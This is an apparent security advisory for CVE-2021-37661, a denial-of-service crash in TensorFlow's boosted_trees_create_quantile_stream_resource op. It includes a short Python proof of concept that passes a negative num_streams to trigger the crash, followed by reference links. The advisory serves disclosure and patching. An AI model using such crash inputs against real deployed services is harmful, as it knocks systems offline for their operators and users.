CVE-2021-37661: Crash caused by integer conversion to unsigned
(updated )
An attacker can cause a denial of service in boosted_trees_create_quantile_stream_resource by using negative arguments:
import tensorflow as tf
from tensorflow.python.ops import gen_boosted_trees_ops
import numpy as np
v= tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0])
gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource(
quantile_stream_resource_handle = v.handle,
epsilon = [74.82224],
num_streams = [-49],
max_elements = np.int32(586))
References
- github.com/advisories/GHSA-gf88-j2mg-cc82
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-574.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-772.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-283.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992
- github.com/tensorflow/tensorflow/security/advisories/GHSA-gf88-j2mg-cc82
- nvd.nist.gov/vuln/detail/CVE-2021-37661
Detect and mitigate CVE-2021-37661 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →